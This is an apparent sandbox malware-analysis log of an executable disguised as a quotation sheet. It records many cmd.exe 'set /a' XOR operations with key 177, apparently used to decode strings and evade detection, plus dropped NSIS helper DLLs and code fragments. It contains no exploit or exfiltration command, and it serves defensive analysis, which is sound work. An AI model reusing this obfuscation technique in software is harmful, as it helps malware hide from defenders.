            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016B4ED pushfd ; iretd 131_2_0016B4F2
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DD00FA pushad ; retf 131_2_37DD00FB
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DEB9FA pushad ; retf 131_2_37DEB9FF
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DEB91B pushad ; retf 131_2_37DEB926
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DEA65F push esp; ret 131_2_37DEA68D
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile created: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile created: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
